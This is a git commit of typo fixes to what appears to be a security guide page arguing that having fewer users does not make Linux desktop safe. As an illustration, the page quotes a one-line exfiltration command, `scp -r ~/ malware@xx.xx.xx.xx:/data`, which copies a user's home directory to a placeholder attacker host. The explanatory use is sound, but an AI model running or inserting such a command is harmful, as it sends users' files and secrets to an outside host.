Typo fixes. (#47)

Signed-off-by: ayaen <ayaen@tutanota.de>
This commit is contained in:
ayaen 2022-08-18 03:14:11 +05:30 committed by tommytran732
parent 7e1f99eb28
commit dd04f8e032
No known key found for this signature in database
GPG key ID: 060B29EB996BD9F2
10 changed files with 26 additions and 26 deletions

View file

@ -52,8 +52,8 @@ Something being open source does not imply that it is inherently private, secure
## But there is less malware on Linux!
**Secuity by irrelevance does not work**. Just because there are fewer users of your favorite operating system does not make it any safer.
**Security by irrelevance does not work**. Just because there are fewer users of your favorite operating system does not make it any safer.
Ask yourself this: Would you ditch Windows for ReactOS considering that it is a lot less popular and is less targetted? Likewise, would you ditch Linux desktop when it becomes the mainstream solution for the BSDs or some niche operating systems just because they are less popular?
Ask yourself this: Would you ditch Windows for ReactOS considering that it is a lot less popular and is less targeted? Likewise, would you ditch Linux desktop when it becomes the mainstream solution for the BSDs or some niche operating systems just because they are less popular?
Malware for Linux does exist, and it is not hard to make. It can be something as trivial as a shell script or binary executing `scp -r ~/ malware@xx.xx.xx.xx:/data`. Due to the lack of application sandboxing or an application permission model, your computer can be compromised the moment you execute a malicious binary, shell script, or install script with or without root and with or without an exploit. This is, of course, not to discount the fact that many exploits do exist on Linux just like on any other operating systems as well.
Malware for Linux does exist, and it is not hard to make. It can be something as trivial as a shell script or binary executing `scp -r ~/ malware@xx.xx.xx.xx:/data`. Due to the lack of application sandboxing or an application permission model, your computer can be compromised the moment you execute a malicious binary, shell script, or install script with or without root and with or without an exploit. This is, of course, not to discount the fact that many exploits do exist on Linux just like on any other operating systems as well.